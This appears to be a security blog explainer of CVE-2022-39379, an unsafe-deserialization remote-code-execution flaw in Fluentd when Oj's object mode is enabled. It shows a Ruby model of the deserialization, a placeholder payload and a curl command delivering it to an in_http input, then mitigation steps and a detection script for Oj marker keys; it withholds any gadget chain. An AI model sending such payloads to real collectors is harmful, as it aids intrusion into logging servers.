*Fluentd* is a widely-used open source data collector, part of many cloud-native stacks, gathering data from apps, services, or containers, and moving it to destinations like files, databases, cloud stores, and analytics tools. But in late 2022, security researchers found a serious security hole in a non-default configuration of Fluentd—a hole that could give remote attackers full control of affected servers with just a single request.

Below, I’ll break down this vulnerability (CVE-2022-39379) in simple terms, explain how it works, show an example exploit, and give pointers to protect your servers.

What is CVE-2022-39379?

CVE-2022-39379 is a Remote Code Execution (RCE) vulnerability in Fluentd that applies only when the process is started with the environment variable FLUENT_OJ_OPTION_MODE set to object.

That value switches the Oj JSON parser from a data-only mode to its *object mode*. In object mode a JSON document is no longer limited to hashes, arrays, strings and numbers: it can name Ruby classes and set their instance variables, so whoever controls the input controls which objects get built inside the Fluentd process. That is the classic unsafe-deserialization pattern, and it is how a remote sender gets from "I can write a log line" to "I can run code on the collector".

- Vulnerability: *Remote, unauthenticated attackers* can send a specially crafted JSON payload that Fluentd deserializes into arbitrary Ruby objects; the advisory rates the result as arbitrary code execution.

- Affected: Fluentd 1.13.2 through 1.15.2, and only when FLUENT_OJ_OPTION_MODE=object is set.

- Patched: Fluentd 1.15.3 and later.

- Not affected: versions earlier than 1.13.2 (the option did not exist yet), and any version running without FLUENT_OJ_OPTION_MODE=object.

Reference: GitHub Security Advisory GHSA-8v5v-653p-xv8p (CVE-2022-39379)

Why This Variable Matters

The environment variable FLUENT_OJ_OPTION_MODE selects the parsing mode of the *Oj* Ruby gem, which Fluentd's json parser uses to decode incoming records.

- In Oj's data-only modes (strict, compat and the like) the parser returns nothing but hashes, arrays, strings, numbers, booleans and nil. The value object instead tells Oj to honour its own object encoding: a JSON object whose "^o" key names a Ruby class becomes an instance of that class, and its remaining keys become instance variables on that instance, recursively. The sender of the JSON therefore decides which classes are instantiated on the server and what internal state they start with, without any constructor or validation running.
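The following is an added illustration written for this post, not Oj's or Fluentd's code: a small reference model of what object mode does with a "^o" marker (look the class up by name, allocate it without running initialize, set instance variables from the remaining keys) next to a data-only parse of the same bytes. AuditRecord and the payload are constructed for the example; the point is that the sender bypasses the class's constructor and its checks entirely.

```ruby
require 'json'

# Constructed stand-in for any class that happens to be loaded in the
# Fluentd process. Object mode needs no opt-in from the class.
class AuditRecord
  attr_reader :path, :mode

  def initialize(path, mode)
    raise ArgumentError, 'path must be absolute' unless path.start_with?('/')
    @path = path
    @mode = mode
  end
end

# Reference model of Oj :object mode (written for this post, not Oj's code):
# a JSON object carrying "^o" is turned into an instance of the named class.
# The class comes from the attacker-controlled string, is allocated without
# running initialize, and every other key becomes an instance variable.
def object_mode_load(value)
  case value
  when Array
    value.map { |v| object_mode_load(v) }
  when Hash
    class_name = value['^o']
    return value.transform_values { |v| object_mode_load(v) } if class_name.nil?

    klass = Object.const_get(class_name) # any class the process has loaded
    obj = klass.allocate                  # constructor and its checks skipped
    value.each do |key, v|
      next if key == '^o'
      obj.instance_variable_set("@#{key}", object_mode_load(v))
    end
    obj
  else
    value
  end
end

def unsafe_load(text)
  object_mode_load(JSON.parse(text))
end

# What a data-only mode (strict/compat) yields for the same bytes: "^o" is
# just another string key and nothing is instantiated.
def data_only_load(text)
  JSON.parse(text)
end

# Constructed sample, not a captured payload: the sender names the class and
# supplies a value the constructor would have rejected.
CRAFTED = '{"^o":"AuditRecord","path":"relative/../etc/shadow","mode":"rw"}'

if __FILE__ == $PROGRAM_NAME
  rec = unsafe_load(CRAFTED)
  puts "#{rec.class}: path=#{rec.path} mode=#{rec.mode}" # live object, check bypassed
  p data_only_load(CRAFTED)                               # plain Hash
end
```

Note that "Kernel" is a module, not a class, so naming it in "^o" fails at allocate; a real chain has to name a class that is already loaded and whose methods do something dangerous with attacker-filled instance variables.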

The Attack

If an attacker knows (or simply guesses) that a Fluentd instance runs with this variable set, they send a crafted JSON document to any input that decodes JSON through Fluentd's json parser, for example in_http or in_tcp configured with a <parse> @type json section; in_http in particular accepts unauthenticated POSTs on port 9880 by default. The parser hands the text to Oj, Oj sees the "^o" marker and builds live Ruby objects from the attacker's description, and whatever those objects do when Fluentd later inspects, compares, serializes or writes the record runs inside the Fluentd process with its privileges.

Here's what a payload in Oj's object encoding looks like. The class name and instance variable below are placeholders: the goal is to show the shape of the input, not to publish a working gadget chain.

Exploit Example

Warning: These details are for educational and defensive purposes only.

Exploit Payload

Oj's object mode reserves the key "^o" to name the Ruby class a JSON object should become; every other key in that object becomes an instance variable on the new instance, and nested objects are handled the same way. (The "json_class"/"method"/"args" keys sometimes shown for this CVE belong to Ruby's JSON gem, not to Oj, and Kernel is a module with nothing to instantiate.) A minimal document in Oj's format looks like this:

{
  "^o": "SomeClass",
  "some_ivar": "attacker-controlled value"
}

When Oj parses this in object mode it does the equivalent of

SomeClass.allocate.tap { |o| o.instance_variable_set(:@some_ivar, "attacker-controlled value") }

…so the sender chooses the class, skips its constructor, and fills in its internal state. Turning that primitive into command execution needs a gadget: a class already loaded in the Fluentd process whose methods do something dangerous with attacker-filled instance variables once the record is inspected, compared, serialized or written out. The advisory rates the issue as remote code execution but does not publish a chain, and this post does not invent one.

Here's how such a document is delivered to an in_http input configured with <parse> @type json (the URL path is the tag; host, port and tag are placeholders):

curl -X POST http://target-fluentd:9880/test.tag \
     -H "Content-Type: application/json" \
     -d '{"^o":"SomeClass","some_ivar":"attacker-controlled value"}'


*(Replace the URL, port, and endpoint as needed.)*

Upgrade Fluentd:

Update to version 1.15.3 or later, where the fix for this advisory shipped.

Remove Dangerous Setting:

*Do not set* FLUENT_OJ_OPTION_MODE=object. Leave the variable unset or use a data-only mode such as strict or compat, and check every place the environment is injected: Dockerfiles, container image defaults, Helm values, systemd units and shell wrappers.

Limit Exposure:

Unauthenticated inputs such as in_http and in_forward should not be reachable from untrusted networks regardless of this CVE; put them behind a firewall, a service mesh or TLS with client authentication.

Review Logs:

Look for inbound JSON records whose keys begin with "^" (Oj's reserved markers such as "^o"), which legitimate log producers essentially never emit, and for unexpected child processes or files created by the fluentd user. Attackers probing for RCE usually leave both kinds of trace.
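The two checks above, as an added example written for this post rather than Fluentd's own tooling: a version/environment test using the bounds the advisory gives (option introduced in 1.13.2, fix in 1.15.3, only the literal mode object is dangerous), and a scanner that flags JSON bodies carrying Oj's "^"-prefixed marker keys. The sample bodies are constructed; the "fluentd X.Y.Z" output format of `fluentd --version` is assumed.

```ruby
require 'json'
require 'rubygems'

# Version bounds from the advisory: the option first appeared in 1.13.2 and
# the fix shipped in 1.15.3. Only the literal mode "object" is affected.
FIRST_VERSION_WITH_OPTION = Gem::Version.new('1.13.2')
FIXED_VERSION = Gem::Version.new('1.15.3')

# `fluentd --version` is assumed to print "fluentd X.Y.Z"; extract X.Y.Z.
def parse_fluentd_version(output)
  m = output.match(/\bfluentd\s+(\d+\.\d+\.\d+)/)
  m && m[1]
end

# True when this version/environment combination is the affected one.
# `env` may be ENV itself or any Hash-like object with #fetch.
def affected?(version, env)
  v = Gem::Version.new(version)
  mode = env.fetch('FLUENT_OJ_OPTION_MODE', '').strip.downcase
  v >= FIRST_VERSION_WITH_OPTION && v < FIXED_VERSION && mode == 'object'
end

# Oj reserves keys beginning with "^" ("^o" class, "^c", "^t", ...) for its
# object-mode encoding. Ordinary log records almost never use them, so their
# presence in inbound JSON is a cheap detection signal. Returns every
# reserved key found anywhere in the document, with the class name for "^o".
def oj_markers(doc)
  found = []
  walk = lambda do |node|
    case node
    when Hash
      node.each do |k, v|
        found << (k == '^o' ? "^o=#{v}" : k) if k.start_with?('^')
        walk.call(v)
      end
    when Array
      node.each { |v| walk.call(v) }
    end
  end
  walk.call(doc)
  found
end

# Detection rule for one request body: flag it when any marker is present.
# Unparseable bodies are not this CVE's concern and are left to other rules.
def suspicious_json?(text)
  !oj_markers(JSON.parse(text)).empty?
rescue JSON::ParserError
  false
end

# Constructed sample bodies standing in for what an in_http listener receives.
SAMPLE_BODIES = [
  '{"level":"info","msg":"user login","user":"alice"}',
  '{"level":"info","msg":"x","extra":{"^o":"SomeClass","name":"foo"}}',
  'not json at all',
].freeze

if __FILE__ == $PROGRAM_NAME
  # Pass the output of `fluentd --version` as the first argument, e.g.
  #   ruby check.rb "$(fluentd --version)"
  version = parse_fluentd_version(ARGV[0] || 'fluentd 1.15.2')
  puts "fluentd #{version}: #{affected?(version, ENV) ? 'AFFECTED' : 'not affected'}"
  SAMPLE_BODIES.each { |b| puts "#{suspicious_json?(b) ? 'ALERT' : 'ok   '} #{b}" }
end
```

The marker check is deliberately broader than "^o" alone: Oj uses several "^"-prefixed keys in object mode, and a probe that uses any of them is worth a look even when it does not name a class.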

Original Advisory on GitHub:

https://github.com/fluent/fluentd/security/advisories/GHSA-8v5v-653p-xv8p

Fluentd Changelog 1.15.3:

https://github.com/fluent/fluentd/releases/tag/v1.15.3

NVD entry:

https://nvd.nist.gov/vuln/detail/CVE-2022-39379

Summary

- CVE-2022-39379 is an RCE affecting non-default Fluentd setups (1.13.2 through 1.15.2) started with FLUENT_OJ_OPTION_MODE=object.

- Exploitable via a crafted JSON payload that Oj's object mode turns into attacker-chosen Ruby objects inside the collector process.

- Fixed in 1.15.3. Stay up to date, *never* enable object-mode deserialization of untrusted input in production, and lock down Fluentd's network-facing inputs.

Fluentd is a strong part of the logging ecosystem, but even great tools have their weak spots—especially when non-default, "advanced" features are enabled that can cost you your whole stack. Stay safe!



Timeline

Published on: 11/02/2022 13:15:00 UTC
Last modified on: 11/04/2022 15:41:00 UTC